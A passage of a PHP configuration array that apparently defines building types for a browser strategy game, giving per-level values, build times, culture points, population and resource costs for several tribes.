'value' => 43, 'time_consume' => 11480, 'cp' => 10, 'people_inc' => 3,

'resources' => array( '1' => 5620, '2' => 3025, '3' => 4755, '4' => 2160 )



'value' => 39, 'time_consume' => 13620, 'cp' => 12, 'people_inc' => 3,

'resources' => array( '1' => 7195, '2' => 3875, '3' => 6085, '4' => 2765 )



'value' => 35, 'time_consume' => 16100, 'cp' => 15, 'people_inc' => 4,

'resources' => array( '1' => 9210, '2' => 4960, '3' => 7790, '4' => 3540 )



'value' => 31, 'time_consume' => 18980, 'cp' => 18, 'people_inc' => 4,

'resources' => array( '1' => 11785, '2' => 6345, '3' => 9975, '4' => 4535 )



'value' => 28, 'time_consume' => 22310, 'cp' => 21, 'people_inc' => 4,

'resources' => array( '1' => 15085, '2' => 8125, '3' => 12765, '4' => 5805 )



'value' => 25, 'time_consume' => 26180, 'cp' => 26, 'people_inc' => 4,

'resources' => array( '1' => 19310, '2' => 10400, '3' => 16340, '4' => 7430 )



'value' => 23, 'time_consume' => 30670, 'cp' => 31, 'people_inc' => 4,

'resources' => array( '1' => 24720, '2' => 13310, '3' => 20915, '4' => 9505 )



'value' => 21, 'time_consume' => 35880, 'cp' => 37, 'people_inc' => 4,

'resources' => array( '1' => 31640, '2' => 17035, '3' => 26775, '4' => 12170 )



'value' => 19, 'time_consume' => 41920, 'cp' => 44, 'people_inc' => 4,

'resources' => array( '1' => 40500, '2' => 21810, '3' => 34270, '4' => 15575 )



'value' => 17, 'time_consume' => 48930, 'cp' => 53, 'people_inc' => 4,

'resources' => array( '1' => 51840, '2' => 27915, '3' => 43865, '4' => 19940 )



'value' => 15, 'time_consume' => 57060, 'cp' => 64, 'people_inc' => 4,

'resources' => array( '1' => 66355, '2' => 35730, '3' => 56145, '4' => 25520 )



'value' => 14, 'time_consume' => 66490, 'cp' => 77, 'people_inc' => 4,

'resources' => array( '1' => 84935, '2' => 45735, '3' => 71870, '4' => 32665 )




'31'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 3, 'time_consume' => 2000, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 70, '2' => 90, '3' => 170, '4' => 70 )



'value' => 6, 'time_consume' => 2620, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 90, '2' => 115, '3' => 220, '4' => 90 )



'value' => 9, 'time_consume' => 3340, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 115, '2' => 145, '3' => 280, '4' => 115 )



'value' => 13, 'time_consume' => 4170, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 145, '2' => 190, '3' => 355, '4' => 145 )



'value' => 16, 'time_consume' => 5140, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 190, '2' => 240, '3' => 455, '4' => 190 )



'value' => 19, 'time_consume' => 6260, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 240, '2' => 310, '3' => 585, '4' => 240 )



'value' => 23, 'time_consume' => 7570, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 310, '2' => 395, '3' => 750, '4' => 310 )



'value' => 27, 'time_consume' => 9080, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 395, '2' => 505, '3' => 955, '4' => 395 )



'value' => 30, 'time_consume' => 10830, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 505, '2' => 650, '3' => 1225, '4' => 505 )



'value' => 34, 'time_consume' => 12860, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 645, '2' => 830, '3' => 1570, '4' => 645 )



'value' => 38, 'time_consume' => 15220, 'cp' => 7, 'people_inc' => 1,

'resources' => array( '1' => 825, '2' => 1065, '3' => 2005, '4' => 825 )



'value' => 43, 'time_consume' => 17950, 'cp' => 9, 'people_inc' => 1,

'resources' => array( '1' => 1060, '2' => 1360, '3' => 2570, '4' => 1060 )



'value' => 47, 'time_consume' => 21130, 'cp' => 11, 'people_inc' => 1,

'resources' => array( '1' => 1355, '2' => 1740, '3' => 3290, '4' => 1355 )



'value' => 51, 'time_consume' => 24810, 'cp' => 13, 'people_inc' => 1,

'resources' => array( '1' => 1735, '2' => 2230, '3' => 4210, '4' => 1735 )



'value' => 56, 'time_consume' => 29080, 'cp' => 15, 'people_inc' => 1,

'resources' => array( '1' => 2220, '2' => 2850, '3' => 5390, '4' => 2220 )



'value' => 60, 'time_consume' => 34030, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 2840, '2' => 3650, '3' => 6895, '4' => 2840 )



'value' => 65, 'time_consume' => 39770, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 3635, '2' => 4675, '3' => 8825, '4' => 3635 )



'value' => 70, 'time_consume' => 46440, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 4650, '2' => 5980, '3' => 11300, '4' => 4650 )



'value' => 75, 'time_consume' => 54170, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 5955, '2' => 7655, '3' => 14460, '4' => 5955 )



'value' => 81, 'time_consume' => 63130, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 7620, '2' => 9800, '3' => 18510, '4' => 7620 )




'32'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '2' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 2, 'time_consume' => 2000, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 120, '2' => 200, '3' => 0, '4' => 80 )



'value' => 4, 'time_consume' => 2620, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 155, '2' => 255, '3' => 0, '4' => 100 )



'value' => 6, 'time_consume' => 3340, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 195, '2' => 330, '3' => 0, '4' => 130 )



'value' => 8, 'time_consume' => 4170, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 250, '2' => 420, '3' => 0, '4' => 170 )



'value' => 10, 'time_consume' => 5140, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 320, '2' => 535, '3' => 0, '4' => 215 )



'value' => 13, 'time_consume' => 6260, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 410, '2' => 685, '3' => 0, '4' => 275 )



'value' => 15, 'time_consume' => 7570, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 530, '2' => 880, '3' => 0, '4' => 350 )



'value' => 17, 'time_consume' => 9080, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 675, '2' => 1125, '3' => 0, '4' => 450 )



'value' => 20, 'time_consume' => 10830, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 865, '2' => 1440, '3' => 0, '4' => 575 )



'value' => 22, 'time_consume' => 12860, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 1105, '2' => 1845, '3' => 0, '4' => 740 )



'value' => 24, 'time_consume' => 15220, 'cp' => 7, 'people_inc' => 1,

'resources' => array( '1' => 1415, '2' => 2360, '3' => 0, '4' => 945 )



'value' => 27, 'time_consume' => 17950, 'cp' => 9, 'people_inc' => 1,

'resources' => array( '1' => 1815, '2' => 3020, '3' => 0, '4' => 1210 )



'value' => 29, 'time_consume' => 21130, 'cp' => 11, 'people_inc' => 1,

'resources' => array( '1' => 2320, '2' => 3870, '3' => 0, '4' => 1545 )



'value' => 32, 'time_consume' => 24810, 'cp' => 13, 'people_inc' => 1,

'resources' => array( '1' => 2970, '2' => 4950, '3' => 0, '4' => 1980 )



'value' => 35, 'time_consume' => 29080, 'cp' => 15, 'people_inc' => 1,

'resources' => array( '1' => 3805, '2' => 6340, '3' => 0, '4' => 2535 )



'value' => 37, 'time_consume' => 34030, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 4870, '2' => 8115, '3' => 0, '4' => 3245 )



'value' => 40, 'time_consume' => 39770, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 6230, '2' => 10385, '3' => 0, '4' => 4155 )



'value' => 43, 'time_consume' => 46440, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 7975, '2' => 13290, '3' => 0, '4' => 5315 )



'value' => 46, 'time_consume' => 54170, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 10210, '2' => 17015, '3' => 0, '4' => 6805 )



'value' => 49, 'time_consume' => 63130, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 13065, '2' => 21780, '3' => 0, '4' => 8710 )




'33'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '3' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 3, 'time_consume' => 2000, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 160, '2' => 100, '3' => 80, '4' => 60 )



'value' => 5, 'time_consume' => 2620, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 205, '2' => 130, '3' => 100, '4' => 75 )



'value' => 8, 'time_consume' => 3340, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 260, '2' => 165, '3' => 130, '4' => 100 )



'value' => 10, 'time_consume' => 4170, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 335, '2' => 210, '3' => 170, '4' => 125 )



'value' => 13, 'time_consume' => 5140, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 430, '2' => 270, '3' => 215, '4' => 160 )



'value' => 16, 'time_consume' => 6260, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 550, '2' => 345, '3' => 275, '4' => 205 )



'value' => 19, 'time_consume' => 7570, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 705, '2' => 440, '3' => 350, '4' => 265 )



'value' => 22, 'time_consume' => 9080, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 900, '2' => 565, '3' => 450, '4' => 340 )



'value' => 25, 'time_consume' => 10830, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 1155, '2' => 720, '3' => 575, '4' => 430 )



'value' => 28, 'time_consume' => 12860, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 1475, '2' => 920, '3' => 740, '4' => 555 )



'value' => 31, 'time_consume' => 15220, 'cp' => 7, 'people_inc' => 1,

'resources' => array( '1' => 1890, '2' => 1180, '3' => 945, '4' => 710 )



'value' => 34, 'time_consume' => 17950, 'cp' => 9, 'people_inc' => 1,

'resources' => array( '1' => 2420, '2' => 1510, '3' => 1210, '4' => 905 )



'value' => 38, 'time_consume' => 21130, 'cp' => 11, 'people_inc' => 1,

'resources' => array( '1' => 3095, '2' => 1935, '3' => 1545, '4' => 1160 )



'value' => 41, 'time_consume' => 24810, 'cp' => 13, 'people_inc' => 1,

'resources' => array( '1' => 3960, '2' => 2475, '3' => 1980, '4' => 1485 )



'value' => 45, 'time_consume' => 29080, 'cp' => 15, 'people_inc' => 1,

'resources' => array( '1' => 5070, '2' => 3170, '3' => 2535, '4' => 1900 )



'value' => 48, 'time_consume' => 34030, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 6490, '2' => 4055, '3' => 3245, '4' => 2435 )



'value' => 52, 'time_consume' => 39770, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 8310, '2' => 5190, '3' => 4155, '4' => 3115 )



'value' => 56, 'time_consume' => 46440, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 10635, '2' => 6645, '3' => 5315, '4' => 3990 )



'value' => 60, 'time_consume' => 54170, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 13610, '2' => 8505, '3' => 6805, '4' => 5105 )



'value' => 64, 'time_consume' => 63130, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 17420, '2' => 10890, '3' => 8710, '4' => 6535 )




'34'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => FALSE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 5, '26' => 3 ),

'levels'=> array(


'value' => 110, 'time_consume' => 2200, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 155, '2' => 130, '3' => 125, '4' => 70 )



'value' => 120, 'time_consume' => 3150, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 200, '2' => 165, '3' => 160, '4' => 90 )



'value' => 130, 'time_consume' => 4260, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 255, '2' => 215, '3' => 205, '4' => 115 )



'value' => 140, 'time_consume' => 5540, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 325, '2' => 275, '3' => 260, '4' => 145 )



'value' => 150, 'time_consume' => 7020, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 415, '2' => 350, '3' => 335, '4' => 190 )



'value' => 160, 'time_consume' => 8750, 'cp' => 3, 'people_inc' => 2,

'resources' => array( '1' => 535, '2' => 445, '3' => 430, '4' => 240 )



'value' => 170, 'time_consume' => 10750, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 680, '2' => 570, '3' => 550, '4' => 310 )



'value' => 180, 'time_consume' => 13070, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 875, '2' => 730, '3' => 705, '4' => 395 )



'value' => 190, 'time_consume' => 15760, 'cp' => 5, 'people_inc' => 2,

'resources' => array( '1' => 1115, '2' => 935, '3' => 900, '4' => 505 )



'value' => 200, 'time_consume' => 18880, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 1430, '2' => 1200, '3' => 1155, '4' => 645 )



'value' => 210, 'time_consume' => 22500, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 1830, '2' => 1535, '3' => 1475, '4' => 825 )



'value' => 220, 'time_consume' => 26700, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 2340, '2' => 1965, '3' => 1890, '4' => 1060 )



'value' => 230, 'time_consume' => 31570, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 3000, '2' => 2515, '3' => 2420, '4' => 1355 )



'value' => 240, 'time_consume' => 37220, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 3840, '2' => 3220, '3' => 3095, '4' => 1735 )



'value' => 250, 'time_consume' => 43780, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 4910, '2' => 4120, '3' => 3960, '4' => 2220 )



'value' => 260, 'time_consume' => 51380, 'cp' => 18, 'people_inc' => 3,

'resources' => array( '1' => 6290, '2' => 5275, '3' => 5070, '4' => 2840 )



'value' => 270, 'time_consume' => 60200, 'cp' => 22, 'people_inc' => 3,

'resources' => array( '1' => 8050, '2' => 6750, '3' => 6490, '4' => 3635 )



'value' => 280, 'time_consume' => 70430, 'cp' => 27, 'people_inc' => 3,

'resources' => array( '1' => 10300, '2' => 8640, '3' => 8310, '4' => 4650 )



'value' => 290, 'time_consume' => 82300, 'cp' => 32, 'people_inc' => 3,

'resources' => array( '1' => 13185, '2' => 11060, '3' => 10635, '4' => 5955 )



'value' => 300, 'time_consume' => 96070, 'cp' => 38, 'people_inc' => 3,

'resources' => array( '1' => 16880, '2' => 14155, '3' => 13610, '4' => 7620 )




'35'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => FALSE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '2' => 1 ),

'pre_requests' => array( '11' => 20, '16' => 10 ),

'levels'=> array(


'value' => 1, 'time_consume' => 1800, 'cp' => 1, 'people_inc' => 6,

'resources' => array( '1' => 1200, '2' => 1400, '3' => 1050, '4' => 2200 )



'value' => 2, 'time_consume' => 2390, 'cp' => 1, 'people_inc' => 3,

'resources' => array( '1' => 1535, '2' => 1790, '3' => 1345, '4' => 2815 )



'value' => 3, 'time_consume' => 3070, 'cp' => 2, 'people_inc' => 3,

'resources' => array( '1' => 1965, '2' => 2295, '3' => 1720, '4' => 3605 )



'value' => 4, 'time_consume' => 3860, 'cp' => 2, 'people_inc' => 3,

'resources' => array( '1' => 2515, '2' => 2935, '3' => 2200, '4' => 4615 )



'value' => 5, 'time_consume' => 4780, 'cp' => 2, 'people_inc' => 3,

'resources' => array( '1' => 3220, '2' => 3760, '3' => 2820, '4' => 5905 )



'value' => 6, 'time_consume' => 5840, 'cp' => 3, 'people_inc' => 4,

'resources' => array( '1' => 4125, '2' => 4810, '3' => 3610, '4' => 7560 )



'value' => 7, 'time_consume' => 7080, 'cp' => 4, 'people_inc' => 4,

'resources' => array( '1' => 5280, '2' => 6155, '3' => 4620, '4' => 9675 )



'value' => 8, 'time_consume' => 8510, 'cp' => 4, 'people_inc' => 4,

'resources' => array( '1' => 6755, '2' => 7880, '3' => 5910, '4' => 12385 )



'value' => 9, 'time_consume' => 10170, 'cp' => 5, 'people_inc' => 4,

'resources' => array( '1' => 8645, '2' => 10090, '3' => 7565, '4' => 15855 )



'value' => 10, 'time_consume' => 12100, 'cp' => 6, 'people_inc' => 4,

'resources' => array( '1' => 11070, '2' => 12915, '3' => 9685, '4' => 20290 )



'value' => 11, 'time_consume' => 14340, 'cp' => 7, 'people_inc' => 4,

'resources' => array( '1' => 14165, '2' => 16530, '3' => 12395, '4' => 25975 )



'value' => 12, 'time_consume' => 16930, 'cp' => 9, 'people_inc' => 4,

'resources' => array( '1' => 18135, '2' => 21155, '3' => 15865, '4' => 33245 )



'value' => 13, 'time_consume' => 19940, 'cp' => 11, 'people_inc' => 4,

'resources' => array( '1' => 23210, '2' => 27080, '3' => 20310, '4' => 42555 )



'value' => 14, 'time_consume' => 23430, 'cp' => 13, 'people_inc' => 4,

'resources' => array( '1' => 29710, '2' => 34660, '3' => 25995, '4' => 54470 )



'value' => 15, 'time_consume' => 27480, 'cp' => 15, 'people_inc' => 4,

'resources' => array( '1' => 38030, '2' => 44370, '3' => 33275, '4' => 69720 )



'value' => 16, 'time_consume' => 32180, 'cp' => 18, 'people_inc' => 5,

'resources' => array( '1' => 48680, '2' => 56790, '3' => 42595, '4' => 89245 )



'value' => 17, 'time_consume' => 37620, 'cp' => 22, 'people_inc' => 5,

'resources' => array( '1' => 62310, '2' => 72690, '3' => 54520, '4' => 114230 )



'value' => 18, 'time_consume' => 43940, 'cp' => 27, 'people_inc' => 5,

'resources' => array( '1' => 79755, '2' => 93045, '3' => 69785, '4' => 146215 )



'value' => 19, 'time_consume' => 51270, 'cp' => 32, 'people_inc' => 5,

'resources' => array( '1' => 102085, '2' => 119100, '3' => 89325, '4' => 187155 )



'value' => 20, 'time_consume' => 59780, 'cp' => 38, 'people_inc' => 5,

'resources' => array( '1' => 130670, '2' => 152445, '3' => 114335, '4' => 239560 )




'36'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '3' => 1 ),

'pre_requests' => array( '16' => 1 ),

'levels'=> array(


'value' => 10, 'time_consume' => 2000, 'cp' => 1, 'people_inc' => 4,

'resources' => array( '1' => 100, '2' => 100, '3' => 100, '4' => 100 )



'value' => 20, 'time_consume' => 2320, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 130, '2' => 130, '3' => 130, '4' => 130 )



'value' => 30, 'time_consume' => 2690, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 165, '2' => 165, '3' => 165, '4' => 165 )



'value' => 40, 'time_consume' => 3120, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 210, '2' => 210, '3' => 210, '4' => 210 )



'value' => 50, 'time_consume' => 3620, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 270, '2' => 270, '3' => 270, '4' => 270 )



'value' => 60, 'time_consume' => 4200, 'cp' => 3, 'people_inc' => 3,

'resources' => array( '1' => 345, '2' => 345, '3' => 345, '4' => 345 )



'value' => 70, 'time_consume' => 4870, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 440, '2' => 440, '3' => 440, '4' => 440 )



'value' => 80, 'time_consume' => 5650, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 565, '2' => 565, '3' => 565, '4' => 565 )



'value' => 90, 'time_consume' => 6560, 'cp' => 5, 'people_inc' => 3,

'resources' => array( '1' => 720, '2' => 720, '3' => 720, '4' => 720 )



'value' => 100, 'time_consume' => 7610, 'cp' => 6, 'people_inc' => 3,

'resources' => array( '1' => 920, '2' => 920, '3' => 920, '4' => 920 )



'value' => 110, 'time_consume' => 8820, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 1180, '2' => 1180, '3' => 1180, '4' => 1180 )



'value' => 120, 'time_consume' => 10230, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 1510, '2' => 1510, '3' => 1510, '4' => 1510 )



'value' => 130, 'time_consume' => 11870, 'cp' => 11, 'people_inc' => 3,

'resources' => array( '1' => 1935, '2' => 1935, '3' => 1935, '4' => 1935 )



'value' => 140, 'time_consume' => 13770, 'cp' => 13, 'people_inc' => 3,

'resources' => array( '1' => 2475, '2' => 2475, '3' => 2475, '4' => 2475 )



'value' => 150, 'time_consume' => 15980, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 3170, '2' => 3170, '3' => 3170, '4' => 3170 )



'value' => 160, 'time_consume' => 18530, 'cp' => 18, 'people_inc' => 4,

'resources' => array( '1' => 4055, '2' => 4055, '3' => 4055, '4' => 4055 )



'value' => 170, 'time_consume' => 21500, 'cp' => 22, 'people_inc' => 4,

'resources' => array( '1' => 5190, '2' => 5190, '3' => 5190, '4' => 5190 )



'value' => 180, 'time_consume' => 24940, 'cp' => 27, 'people_inc' => 4,

'resources' => array( '1' => 6645, '2' => 6645, '3' => 6645, '4' => 6645 )



'value' => 190, 'time_consume' => 28930, 'cp' => 32, 'people_inc' => 4,

'resources' => array( '1' => 8505, '2' => 8505, '3' => 8505, '4' => 8505 )



'value' => 200, 'time_consume' => 33550, 'cp' => 38, 'people_inc' => 4,

'resources' => array( '1' => 10890, '2' => 10890, '3' => 10890, '4' => 10890 )




'37'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 3, '16' => 1 ),

'levels'=> array(


'value' => 0, 'time_consume' => 2300, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 700, '2' => 670, '3' => 700, '4' => 240 )



'value' => 0, 'time_consume' => 2670, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 930, '2' => 890, '3' => 930, '4' => 320 )



'value' => 0, 'time_consume' => 3090, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 1240, '2' => 1185, '3' => 1240, '4' => 425 )



'value' => 0, 'time_consume' => 3590, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 1645, '2' => 1575, '3' => 1645, '4' => 565 )



'value' => 0, 'time_consume' => 4160, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 2190, '2' => 2095, '3' => 2190, '4' => 750 )



'value' => 0, 'time_consume' => 4830, 'cp' => 3, 'people_inc' => 2,

'resources' => array( '1' => 2915, '2' => 2790, '3' => 2915, '4' => 1000 )



'value' => 0, 'time_consume' => 5600, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 3875, '2' => 3710, '3' => 3875, '4' => 1330 )



'value' => 0, 'time_consume' => 6500, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 5155, '2' => 4930, '3' => 5155, '4' => 1765 )



'value' => 0, 'time_consume' => 7540, 'cp' => 5, 'people_inc' => 2,

'resources' => array( '1' => 6855, '2' => 6560, '3' => 6855, '4' => 2350 )



'value' => 1, 'time_consume' => 8750, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 9115, '2' => 8725, '3' => 9115, '4' => 3125 )



'value' => 1, 'time_consume' => 10150, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 12125, '2' => 11605, '3' => 12125, '4' => 4155 )



'value' => 1, 'time_consume' => 11770, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 16125, '2' => 15435, '3' => 16125, '4' => 5530 )



'value' => 1, 'time_consume' => 13650, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 21445, '2' => 20525, '3' => 21445, '4' => 7350 )



'value' => 1, 'time_consume' => 15840, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 28520, '2' => 27300, '3' => 28520, '4' => 9780 )



'value' => 2, 'time_consume' => 18370, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 37935, '2' => 36310, '3' => 37935, '4' => 13005 )



'value' => 2, 'time_consume' => 21310, 'cp' => 18, 'people_inc' => 3,

'resources' => array( '1' => 50450, '2' => 48290, '3' => 50450, '4' => 17300 )



'value' => 2, 'time_consume' => 24720, 'cp' => 22, 'people_inc' => 3,

'resources' => array( '1' => 67100, '2' => 64225, '3' => 67100, '4' => 23005 )



'value' => 2, 'time_consume' => 28680, 'cp' => 27, 'people_inc' => 3,

'resources' => array( '1' => 89245, '2' => 85420, '3' => 89245, '4' => 30600 )



'value' => 2, 'time_consume' => 33260, 'cp' => 32, 'people_inc' => 3,

'resources' => array( '1' => 118695, '2' => 113605, '3' => 118695, '4' => 40695 )



'value' => 3, 'time_consume' => 38590, 'cp' => 38, 'people_inc' => 3,

'resources' => array( '1' => 157865, '2' => 151095, '3' => 157865, '4' => 54125 )




'38'=> array (

'support_multiple' => TRUE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => TRUE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 10 ),

'levels'=> array(


'value' => 3600, 'time_consume' => 4500, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 650, '2' => 800, '3' => 450, '4' => 200 )



'value' => 5100, 'time_consume' => 5370, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 830, '2' => 1025, '3' => 575, '4' => 255 )



'value' => 6900, 'time_consume' => 6380, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 1065, '2' => 1310, '3' => 735, '4' => 330 )



'value' => 9300, 'time_consume' => 7550, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 1365, '2' => 1680, '3' => 945, '4' => 420 )



'value' => 12000, 'time_consume' => 8910, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 1745, '2' => 2145, '3' => 1210, '4' => 535 )



'value' => 15000, 'time_consume' => 10490, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 2235, '2' => 2750, '3' => 1545, '4' => 685 )



'value' => 18900, 'time_consume' => 12310, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 2860, '2' => 3520, '3' => 1980, '4' => 880 )



'value' => 23400, 'time_consume' => 14430, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 3660, '2' => 4505, '3' => 2535, '4' => 1125 )



'value' => 28800, 'time_consume' => 16890, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 4685, '2' => 5765, '3' => 3245, '4' => 1440 )



'value' => 35400, 'time_consume' => 19740, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 5995, '2' => 7380, '3' => 4150, '4' => 1845 )



'value' => 43200, 'time_consume' => 23050, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 7675, '2' => 9445, '3' => 5315, '4' => 2360 )



'value' => 52800, 'time_consume' => 26890, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 9825, '2' => 12090, '3' => 6800, '4' => 3020 )



'value' => 64200, 'time_consume' => 31340, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 12575, '2' => 15475, '3' => 8705, '4' => 3870 )



'value' => 77700, 'time_consume' => 36510, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 16095, '2' => 19805, '3' => 11140, '4' => 4950 )



'value' => 93900, 'time_consume' => 42500, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 20600, '2' => 25355, '3' => 14260, '4' => 6340 )



'value' => 113700, 'time_consume' => 49450, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 26365, '2' => 32450, '3' => 18255, '4' => 8115 )



'value' => 137100, 'time_consume' => 57510, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 33750, '2' => 41540, '3' => 23365, '4' => 10385 )



'value' => 165300, 'time_consume' => 66860, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 43200, '2' => 53170, '3' => 29910, '4' => 13290 )



'value' => 199200, 'time_consume' => 77700, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 55295, '2' => 68055, '3' => 38280, '4' => 17015 )



'value' => 240000, 'time_consume' => 90290, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 70780, '2' => 87110, '3' => 49000, '4' => 21780 )




'39'=> array (

